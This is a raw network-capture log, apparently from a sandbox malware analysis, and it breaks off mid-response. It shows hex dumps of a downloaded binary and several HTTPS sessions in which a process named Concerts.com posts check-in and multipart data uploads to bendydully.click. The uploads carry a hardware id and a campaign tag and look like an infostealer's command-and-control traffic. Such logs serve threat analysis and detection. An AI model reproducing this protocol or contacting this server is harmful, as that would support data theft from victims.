eb 47 00 8b 35 24 91 40 00 50 6a 40 89 45 bc ff d6 8b f8 3b fb 74 7b 53 e8 b1 04 00 00 ff 75 bc 57 e8 76 04 00 00 ff Data Ascii: `@9]PWf9V1Pd@f9TPW1Ph@+j=TQPl@u3fPW:1PV1jEfVu.ujV/jh@V/EG5$@Pj@E;t{SuWv
2024-12-06 14:25:47 UTC	1369	IN	Data Raw: 35 b8 ea 47 00 ff 15 30 92 40 00 6a 05 50 a3 70 c1 42 00 ff 15 44 92 40 00 5e c3 55 8b ec 56 8b 75 0c 6a 00 8d 45 0c 50 56 ff 75 08 ff 35 10 c0 40 00 ff 15 58 91 40 00 85 c0 74 0a 39 75 0c 75 05 33 c0 40 eb 02 33 c0 5e 5d c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 10 c0 40 00 ff 15 60 91 40 00 c2 04 00 55 8b ec 81 ec 98 00 00 00 53 8b 5d 10 56 8b 75 14 57 33 ff 89 75 f8 3b df 75 07 c7 45 f8 00 80 00 00 89 7d fc 89 5d f4 3b df 75 07 c7 45 f4 70 41 42 00 8b 45 08 3b c7 7c 0e 8b 0d f8 ea 47 00 03 c8 51 e8 a1 ff ff ff 6a 04 8d 45 14 50 e8 64 ff ff ff 85 c0 75 08 6a fd 58 e9 89 01 00 00 f7 45 14 00 00 00 80 0f 84 5b 01 00 00 8b 1d 90 90 40 00 ff d3 81 65 14 ff ff ff 7f 89 45 f0 b8 28 5d 43 00 a3 30 dd 43 00 a3 2c dd 43 00 8b 45 14 c7 05 88 41 43 00 08 00 00 00 89 Data Ascii: 5G0@jPpBD@^UVujEPVu5@X@t9uu3@3^]jjt$5@`@US]VuW3u;uE}];uEpABE;\|GQjEPdujXE[@eE(]C0C,CEAC
2024-12-06 14:25:47 UTC	1369	IN	Data Raw: f7 74 0a 66 85 f6 0f 95 c0 8d 44 00 ff 5f 5e 5d c3 a1 10 c0 40 00 83 f8 ff 74 0e 50 ff 15 bc 90 40 00 83 0d 10 c0 40 00 ff e8 0d 04 00 00 6a 07 68 d0 70 4e 00 e8 19 34 00 00 c3 81 ec d4 02 00 00 53 55 56 57 6a 20 33 ed 5e 89 6c 24 18 c7 44 24 10 68 a2 40 00 89 6c 24 14 ff 15 30 90 40 00 68 01 80 00 00 ff 15 b4 90 40 00 55 ff 15 c0 92 40 00 6a 08 a3 98 eb 47 00 e8 36 2a 00 00 55 68 b4 02 00 00 a3 b0 ea 47 00 8d 44 24 38 50 55 68 64 a2 40 00 ff 15 84 91 40 00 68 4c a2 40 00 68 a0 6a 47 00 e8 18 27 00 00 ff 15 b0 90 40 00 50 bf a0 f0 4c 00 57 e8 06 27 00 00 55 ff 15 34 91 40 00 66 83 3d a0 f0 4c 00 22 a3 b8 ea 47 00 8b c7 75 08 6a 22 5e b8 a2 f0 4c 00 56 50 e8 dc 23 00 00 50 ff 15 60 92 40 00 8b f0 89 74 24 1c e9 8e 00 00 00 6a 20 5b 66 3b c3 75 08 83 c6 02 Data Ascii: tfD_^]@tP@@jhpN4SUVWj 3^l$D$h@l$0@h@U@jG6*UhGD$8PUhd@@hL@hjG'@PLW'U4@f=L"Guj"^LVP#P`@t$j [f;u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49875	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:09 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bendydully.click
2024-12-06 14:27:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-06 14:27:12 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3f4opdbg3dsdpf869u3iifcbq2; expires=Tue, 01-Apr-2025 08:13:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QT1025kXOrGyRdnK2g14tR5qFAjNIke1uO12U1vLBt6ZQnL6TuKAd%2BFR9zm4vOt2a0RaJ%2BOxANiaWliZ1f6Y%2BBTpPcVHCCoqkPqlu4pelMAj%2FW4v5h7F9TUeE0MrFGnHRixs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf484b8a17ced-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2779&min_rtt=2575&rtt_var=1374&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=693751&cwnd=179&unsent_bytes=0&cid=d16bc3ccfee83438&ts=2597&x=0"
2024-12-06 14:27:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-06 14:27:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49884	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:13 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: bendydully.click
2024-12-06 14:27:13 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 53 45 4f 54 52 41 46 46 55 50 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--SEOTRAFFUP&j=
2024-12-06 14:27:19 UTC	1010	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h8c18t0ur8j5e89fqdso1qf99p; expires=Tue, 01-Apr-2025 08:13:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=efYMsVndvhKQs4BF4aqrWwfywQ3MYMqXGB3WY%2BsUsYZwCeYUCvm5VkYGj%2FE7ufgHjiuF2f7LUB0iphAqspnkZEKYYe49v23fWe3iksLPM178InuYrHYkDTAPccCegwT%2B4No8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf49cca63c420-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1567&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=952&delivery_rate=1859872&cwnd=225&unsent_bytes=0&cid=47c69d2203881deb&ts=5401&x=0"
2024-12-06 14:27:19 UTC	359	IN	Data Raw: 34 34 64 63 0d 0a 4d 63 63 35 75 74 38 4b 75 67 75 4e 4b 49 4d 58 67 2f 66 4a 59 59 64 51 2f 4e 68 57 74 70 4a 55 74 5a 55 2f 64 43 4b 4b 73 77 64 4b 35 55 2b 59 35 54 36 57 4b 66 35 4e 6f 53 33 33 68 62 77 45 71 33 4b 64 76 48 53 4d 39 44 58 5a 35 6c 70 59 41 50 7a 65 4a 51 75 68 57 4e 61 73 62 35 59 70 36 46 43 68 4c 64 69 4d 36 77 54 70 63 73 62 36 4d 39 7a 77 4e 64 6e 33 58 68 39 4e 2b 74 39 6b 57 61 74 65 30 72 70 70 33 6d 72 68 52 65 5a 79 35 70 61 6a 44 2b 34 39 6c 4c 56 30 6d 72 41 78 7a 37 63 46 56 6d 2f 76 78 32 5a 38 70 6b 72 52 2f 58 65 57 63 4b 39 4e 37 54 57 35 31 61 67 45 35 54 79 61 76 44 33 65 2b 6a 7a 52 39 6c 73 65 55 75 50 56 62 31 6d 6c 58 64 4f 77 59 4d 70 6e 36 30 4c 74 64 4f 79 57 36 30 32 6c 4e 59 62 36 62 4a 53 6a 42 4e 54 6d 54 Data Ascii: 44dcMcc5ut8KuguNKIMXg/fJYYdQ/NhWtpJUtZU/dCKKswdK5U+Y5T6WKf5NoS33hbwEq3KdvHSM9DXZ5lpYAPzeJQuhWNasb5Yp6FChLdiM6wTpcsb6M9zwNdn3Xh9N+t9kWate0rpp3mrhReZy5pajD+49lLV0mrAxz7cFVm/vx2Z8pkrR/XeWcK9N7TW51agE5TyavD3e+jzR9lseUuPVb1mlXdOwYMpn60LtdOyW602lNYb6bJSjBNTmT
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 30 48 71 63 50 4f 65 6f 67 37 6f 4d 70 4f 77 4f 39 66 77 4d 64 33 39 55 68 78 45 35 64 78 6a 55 36 55 62 6c 76 31 76 77 43 6d 33 43 73 4a 77 38 5a 4b 6e 46 61 63 49 33 71 56 36 7a 62 41 78 32 37 63 46 56 6b 6a 74 30 6d 5a 59 71 6c 6a 51 74 6e 72 59 65 2b 6c 48 35 47 66 6e 6b 4b 55 4a 35 69 43 55 74 44 4c 58 2b 54 33 65 38 6c 6f 53 41 4b 61 52 59 6b 76 6c 41 35 69 63 5a 64 4e 6c 35 56 33 68 4e 66 37 62 73 6b 50 69 50 74 37 69 64 4e 44 78 4d 74 62 7a 55 78 68 45 35 4e 64 72 58 71 70 64 30 72 31 76 30 6d 48 6e 53 2b 78 2b 37 70 57 75 44 75 45 30 6b 72 73 78 6c 4c 35 32 30 4f 38 64 54 67 44 47 31 6d 5a 42 35 32 37 62 73 32 62 66 66 36 39 56 72 32 79 68 6b 71 64 44 76 58 4b 51 76 7a 76 47 38 53 54 53 2b 55 38 61 52 65 37 63 5a 6c 32 6c 58 74 2b 77 5a 74 35 75 Data Ascii: 0HqcPOeog7oMpOwO9fwMd39UhxE5dxjU6Ublv1vwCm3CsJw8ZKnFacI3qV6zbAx27cFVkjt0mZYqljQtnrYe+lH5GfnkKUJ5iCUtDLX+T3e8loSAKaRYkvlA5icZdNl5V3hNf7bskPiPt7idNDxMtbzUxhE5NdrXqpd0r1v0mHnS+x+7pWuDuE0krsxlL520O8dTgDG1mZB527bs2bff69Vr2yhkqdDvXKQvzvG8STS+U8aRe7cZl2lXt+wZt5u
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 79 68 6b 71 64 44 76 58 4b 54 73 6a 48 52 2f 7a 66 64 2b 56 67 63 54 4f 44 66 5a 6b 47 71 58 39 69 78 59 4e 4a 6b 34 55 37 70 66 4f 71 65 72 51 50 6b 4f 4e 37 30 64 4e 50 6f 64 6f 2b 33 61 52 46 4d 35 64 34 6e 5a 71 5a 56 31 72 70 2b 6d 48 61 68 55 36 46 79 37 64 58 7a 51 2b 6b 37 6e 72 45 2b 30 50 41 78 32 76 4a 65 45 55 50 6c 31 6d 39 64 6f 6c 2f 55 74 47 58 65 61 65 68 4f 35 47 66 6b 6e 4b 63 50 70 58 7a 65 76 53 79 55 71 48 62 34 38 45 73 56 62 2b 76 41 62 42 4f 36 46 63 48 39 62 39 51 70 74 77 72 6d 63 4f 6d 65 72 51 76 6c 49 4a 75 30 50 39 58 36 4d 4e 62 36 55 52 42 41 36 64 46 6a 58 36 56 63 33 36 39 36 33 57 2f 39 51 4b 45 37 6f 5a 4b 7a 51 37 31 79 71 4b 6f 6a 78 65 5a 30 34 76 52 54 47 45 66 2b 6b 58 6f 64 76 42 76 66 73 53 69 41 4b 65 52 4b 37 Data Ascii: yhkqdDvXKTsjHR/zfd+VgcTODfZkGqX9ixYNJk4U7pfOqerQPkON70dNPodo+3aRFM5d4nZqZV1rp+mHahU6Fy7dXzQ+k7nrE+0PAx2vJeEUPl1m9dol/UtGXeaehO5GfknKcPpXzevSyUqHb48EsVb+vAbBO6FcH9b9QptwrmcOmerQvlIJu0P9X6MNb6URBA6dFjX6Vc36963W/9QKE7oZKzQ71yqKojxeZ04vRTGEf+kXodvBvfsSiAKeRK7
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 35 41 2b 67 32 6b 72 34 38 33 2f 70 32 6d 62 64 61 44 67 43 77 6b 56 42 65 71 6c 76 62 71 79 6a 48 4a 2f 59 4b 35 6e 6d 68 7a 65 73 50 36 7a 4b 52 74 6a 6a 66 2b 44 66 62 2b 56 6f 54 53 65 44 5a 64 31 4b 68 55 39 6d 7a 5a 39 6c 74 36 6b 2f 6c 63 75 57 54 70 45 4f 72 63 70 6d 69 64 49 79 77 47 66 44 43 48 7a 64 36 71 4d 34 72 53 75 56 63 31 50 30 77 6d 47 58 73 52 75 6c 36 35 35 79 6e 43 65 77 35 6b 72 45 77 32 50 6b 7a 30 66 5a 59 45 30 48 73 33 57 39 56 70 6c 6a 58 73 6d 66 51 4b 61 45 4b 35 6d 32 68 7a 65 73 6d 38 6a 6d 51 76 48 54 4c 76 69 2b 58 38 46 46 57 47 4b 6a 64 62 46 57 6a 58 74 53 38 62 74 42 73 35 30 37 67 63 2b 65 57 70 41 66 67 4d 35 47 2b 4f 4e 72 36 4e 39 62 37 56 68 6c 4c 37 5a 45 72 45 36 4a 44 6d 4f 55 6f 36 57 72 35 58 66 46 35 6f 59 Data Ascii: 5A+g2kr483/p2mbdaDgCwkVBeqlvbqyjHJ/YK5nmhzesP6zKRtjjf+Dfb+VoTSeDZd1KhU9mzZ9lt6k/lcuWTpEOrcpmidIywGfDCHzd6qM4rSuVc1P0wmGXsRul655ynCew5krEw2Pkz0fZYE0Hs3W9VpljXsmfQKaEK5m2hzesm8jmQvHTLvi+X8FFWGKjdbFWjXtS8btBs507gc+eWpAfgM5G+ONr6N9b7VhlL7ZErE6JDmOUo6Wr5XfF5oY
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 4e 59 62 36 62 4a 54 65 50 63 54 67 58 68 68 4c 2f 73 6f 6c 54 4f 74 43 6d 4c 70 6b 6d 44 47 76 53 65 70 2b 35 5a 57 6e 41 2b 45 2f 6e 71 67 37 30 2f 63 2f 33 4f 56 58 45 55 66 6a 32 57 35 63 6f 30 6e 55 73 33 72 64 65 2f 30 4b 72 7a 58 6d 6a 65 74 62 70 51 53 5a 71 69 54 58 73 67 66 42 39 45 73 64 54 65 53 52 65 68 32 38 47 39 2b 78 4b 49 41 70 36 55 58 6f 64 75 36 55 6f 67 2f 6f 4e 35 65 2f 4e 64 4c 30 50 4e 33 33 57 78 42 42 37 64 74 6d 55 71 39 53 33 37 56 76 32 33 75 76 42 4b 46 79 2b 64 58 7a 51 38 77 31 6a 4c 51 6b 6c 4f 39 34 7a 72 64 61 47 67 43 77 6b 57 46 5a 71 6c 2f 66 73 57 37 64 62 2b 4a 4c 37 6e 54 68 6d 71 38 49 37 44 53 66 74 7a 48 5a 39 43 54 64 2f 46 49 61 53 65 54 63 4a 52 33 6c 58 4d 44 39 4d 4a 68 59 34 6b 54 76 63 76 66 56 74 45 33 Data Ascii: NYb6bJTePcTgXhhL/solTOtCmLpkmDGvSep+5ZWnA+E/nqg70/c/3OVXEUfj2W5co0nUs3rde/0KrzXmjetbpQSZqiTXsgfB9EsdTeSReh28G9+xKIAp6UXodu6Uog/oN5e/NdL0PN33WxBB7dtmUq9S37Vv23uvBKFy+dXzQ8w1jLQklO94zrdaGgCwkWFZql/fsW7db+JL7nThmq8I7DSftzHZ9CTd/FIaSeTcJR3lXMD9MJhY4kTvcvfVtE3
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 7a 66 53 39 6a 33 62 35 56 51 57 51 2b 4f 52 4b 78 4f 69 51 35 6a 6c 4b 50 74 2b 2b 55 44 6d 65 66 65 65 71 67 44 7a 50 34 37 36 65 70 54 68 4d 63 61 33 42 51 42 51 2f 39 5a 36 48 62 77 62 33 37 45 6f 67 43 6e 70 51 2b 64 79 35 35 75 35 42 75 4d 39 6b 62 4d 39 30 50 67 31 31 2f 4e 5a 45 55 58 72 33 57 35 55 70 6c 54 63 74 47 62 52 5a 71 38 45 6f 58 4c 35 31 66 4e 44 78 43 6d 64 74 6a 6d 55 37 33 6a 4f 74 31 6f 61 41 4c 43 52 61 56 32 67 57 39 4b 37 62 4e 31 76 35 55 2f 68 66 75 4b 61 72 77 58 68 50 5a 36 78 50 64 58 32 4d 39 33 38 57 78 74 44 37 74 63 6c 48 65 56 63 77 50 30 77 6d 45 6e 30 52 2b 31 79 6f 59 72 6c 47 71 55 31 6b 76 70 73 6c 50 73 36 30 2f 42 64 47 30 50 67 31 47 46 5a 6f 46 76 51 72 32 44 59 62 76 31 59 34 58 7a 6b 6d 61 67 44 34 54 53 58 Data Ascii: zfS9j3b5VQWQ+ORKxOiQ5jlKPt++UDmefeeqgDzP476epThMca3BQBQ/9Z6Hbwb37EogCnpQ+dy55u5BuM9kbM90Pg11/NZEUXr3W5UplTctGbRZq8EoXL51fNDxCmdtjmU73jOt1oaALCRaV2gW9K7bN1v5U/hfuKarwXhPZ6xPdX2M938WxtD7tclHeVcwP0wmEn0R+1yoYrlGqU1kvpslPs60/BdG0Pg1GFZoFvQr2DYbv1Y4XzkmagD4TSX
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 38 6e 36 62 63 46 44 33 36 6f 32 6e 4e 55 74 56 6a 4f 74 6d 58 55 65 4e 45 4b 75 53 47 7a 78 2f 6c 52 74 79 33 65 70 51 75 61 73 44 65 58 72 32 51 50 41 50 36 52 50 51 48 72 47 38 72 39 4d 4a 67 75 37 46 6a 7a 63 2b 4b 44 71 45 54 62 44 4c 6d 73 50 74 50 67 4d 63 44 34 48 56 67 41 35 35 45 39 61 75 56 53 33 36 5a 35 7a 6d 54 2f 54 61 46 4b 72 39 57 7a 51 37 31 79 71 37 6b 36 32 76 63 67 78 72 70 36 41 45 72 76 77 57 4a 45 71 68 75 57 2f 57 36 59 4d 62 77 45 6f 58 48 77 31 66 4e 54 74 32 6e 4c 36 57 4f 45 6f 69 6d 5a 37 68 30 41 41 4c 43 44 4b 78 4f 33 47 34 44 39 4c 39 74 37 2f 55 7a 69 59 2b 4c 53 6c 54 33 43 4b 4a 4f 38 49 38 58 4f 43 4e 44 74 55 42 42 58 2b 5a 31 77 55 4b 74 56 33 36 73 6f 6c 69 6e 67 43 72 6c 4d 6f 64 33 72 50 4b 74 79 68 76 70 73 6c Data Ascii: 8n6bcFD36o2nNUtVjOtmXUeNEKuSGzx/lRty3epQuasDeXr2QPAP6RPQHrG8r9MJgu7Fjzc+KDqETbDLmsPtPgMcD4HVgA55E9auVS36Z5zmT/TaFKr9WzQ71yq7k62vcgxrp6AErvwWJEqhuW/W6YMbwEoXHw1fNTt2nL6WOEoimZ7h0AALCDKxO3G4D9L9t7/UziY+LSlT3CKJO8I8XOCNDtUBBX+Z1wUKtV36solingCrlMod3rPKtyhvpsl
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 6c 51 6c 68 5a 71 4d 63 6c 43 2f 63 56 6d 4b 38 6f 67 43 6d 6f 53 66 4e 6e 35 35 61 39 41 4b 49 4d 6f 4a 30 36 30 2f 45 67 78 2b 42 53 4b 48 37 39 30 6d 74 64 6f 6b 33 4a 2f 53 61 59 5a 71 38 53 32 44 57 70 31 5a 52 4e 70 53 72 65 34 6e 54 68 38 7a 6a 5a 38 45 73 48 44 63 2f 66 59 6c 4b 7a 53 38 2b 79 4b 4a 59 70 36 51 71 35 4a 36 2f 56 72 78 4b 6c 61 73 37 6f 62 34 47 6a 59 59 65 6c 51 6c 68 5a 71 4d 63 6c 43 2f 63 56 6d 4b 38 6f 67 43 6d 6f 53 66 4e 6e 35 35 61 39 41 4b 49 4d 6f 4a 30 36 30 2f 45 67 78 2b 42 53 57 57 37 65 38 46 74 74 73 46 6a 57 73 32 2f 4f 65 4b 38 45 6f 58 71 68 7a 5a 4a 44 72 58 4b 68 39 48 54 4d 73 47 36 58 77 6c 34 59 54 75 2f 48 64 42 36 43 56 64 2b 38 66 73 68 2b 34 41 58 50 51 38 44 56 35 55 50 6a 63 73 62 6f 65 70 54 30 4a 35 Data Ascii: lQlhZqMclC/cVmK8ogCmoSfNn55a9AKIMoJ060/Egx+BSKH790mtdok3J/SaYZq8S2DWp1ZRNpSre4nTh8zjZ8EsHDc/fYlKzS8+yKJYp6Qq5J6/VrxKlas7ob4GjYYelQlhZqMclC/cVmK8ogCmoSfNn55a9AKIMoJ060/Egx+BSWW7e8FttsFjWs2/OeK8EoXqhzZJDrXKh9HTMsG6Xwl4YTu/HdB6CVd+8fsh+4AXPQ8DV5UPjcsboepT0J5
2024-12-06 14:27:19 UTC	1369	IN	Data Raw: 41 74 6e 48 5a 6c 4f 72 58 4a 6a 7a 4b 4d 41 70 74 77 72 4d 5a 2b 61 46 71 45 4f 72 63 70 4c 36 62 4a 54 39 4a 4e 44 6e 58 6c 70 48 38 74 59 6c 54 4f 74 43 6d 4b 73 6f 67 44 71 68 43 76 4d 31 75 64 58 73 44 65 67 7a 6e 62 51 33 78 75 49 77 31 4f 46 65 55 58 37 57 2f 48 64 55 74 56 69 61 6a 47 58 63 66 2f 70 4a 38 58 4c 66 71 34 59 52 34 69 4b 64 2b 42 6a 54 2f 54 72 70 79 57 6f 48 52 2f 69 54 51 31 43 7a 57 4a 6a 7a 4b 4d 41 70 74 77 72 4d 5a 2b 61 46 71 45 48 4a 4e 5a 4f 32 64 4d 75 2b 4c 35 66 68 48 55 34 54 70 70 46 33 45 2f 30 62 6e 37 35 36 79 6d 2f 73 58 4f 49 79 33 36 75 47 45 65 49 69 6e 66 67 46 32 66 51 67 77 76 52 4e 45 58 37 57 2f 48 64 55 74 56 69 61 6d 46 4b 61 57 50 6c 4a 34 58 76 6d 31 65 56 44 2f 58 4c 47 2b 68 6e 47 39 79 62 55 74 58 67 Data Ascii: AtnHZlOrXJjzKMAptwrMZ+aFqEOrcpL6bJT9JNDnXlpH8tYlTOtCmKsogDqhCvM1udXsDegznbQ3xuIw1OFeUX7W/HdUtViajGXcf/pJ8XLfq4YR4iKd+BjT/TrpyWoHR/iTQ1CzWJjzKMAptwrMZ+aFqEHJNZO2dMu+L5fhHU4TppF3E/0bn756ym/sXOIy36uGEeIinfgF2fQgwvRNEX7W/HdUtViamFKaWPlJ4Xvm1eVD/XLG+hnG9ybUtXg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49902	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:20 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W188QEUGVZ7KJQ3J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12828 Host: bendydully.click
2024-12-06 14:27:20 UTC	12828	OUT	Data Raw: 2d 2d 57 31 38 38 51 45 55 47 56 5a 37 4b 4a 51 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 37 36 31 37 32 42 30 32 38 36 42 38 44 45 41 43 30 46 30 33 31 45 42 45 45 31 35 37 44 0d 0a 2d 2d 57 31 38 38 51 45 55 47 56 5a 37 4b 4a 51 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 31 38 38 51 45 55 47 56 5a 37 4b 4a 51 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 53 45 4f 54 52 41 46 46 55 50 0d Data Ascii: --W188QEUGVZ7KJQ3JContent-Disposition: form-data; name="hwid"7C876172B0286B8DEAC0F031EBEE157D--W188QEUGVZ7KJQ3JContent-Disposition: form-data; name="pid"2--W188QEUGVZ7KJQ3JContent-Disposition: form-data; name="lid"c2CoW0--SEOTRAFFUP
2024-12-06 14:27:25 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ibd3fvat9jetga1p7ooa8l4g5h; expires=Tue, 01-Apr-2025 08:14:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQpQWdil1XkP8Ghq1wryg%2BGPtSojBKwisYmPVAPsHWjTb9em1l18sFjgoGeY2e3wZ38YDu2iAN6iJXDCz4ZuNFTc8dwbmCzT2Bqx0Wzyw%2FYA1GTE56krYdChB2ec7aGGkULg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf4c6bfb5727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1917&rtt_var=746&sent=11&recv=16&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13766&delivery_rate=1441263&cwnd=230&unsent_bytes=0&cid=02e20054ad9a02d8&ts=4600&x=0"
2024-12-06 14:27:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-06 14:27:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49915	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:26 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HVO8VUIUMY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15034 Host: bendydully.click
2024-12-06 14:27:26 UTC	15034	OUT	Data Raw: 2d 2d 48 56 4f 38 56 55 49 55 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 37 36 31 37 32 42 30 32 38 36 42 38 44 45 41 43 30 46 30 33 31 45 42 45 45 31 35 37 44 0d 0a 2d 2d 48 56 4f 38 56 55 49 55 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 56 4f 38 56 55 49 55 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 53 45 4f 54 52 41 46 46 55 50 0d 0a 2d 2d 48 56 4f 38 56 55 49 55 4d 59 0d 0a 43 6f 6e Data Ascii: --HVO8VUIUMYContent-Disposition: form-data; name="hwid"7C876172B0286B8DEAC0F031EBEE157D--HVO8VUIUMYContent-Disposition: form-data; name="pid"2--HVO8VUIUMYContent-Disposition: form-data; name="lid"c2CoW0--SEOTRAFFUP--HVO8VUIUMYCon
2024-12-06 14:27:29 UTC	1018	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aub0uovknc9k8b7stl0c0n79pn; expires=Tue, 01-Apr-2025 08:14:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I3uyuRRjrZa0lQHsdfBitqHx1VVZZCu7SM4vhycxfLB2oyWiDXLI0Rpf08Rreh%2Bwzi0ij5E2SYUt%2FTJRe2GNIu21ZeBaof%2BzzDj%2FS6zJ7KUDUH43BLTq6CMeReG2N1n6q2%2Fl"}],"group":"cf-nel","max_age":604800} NEL: 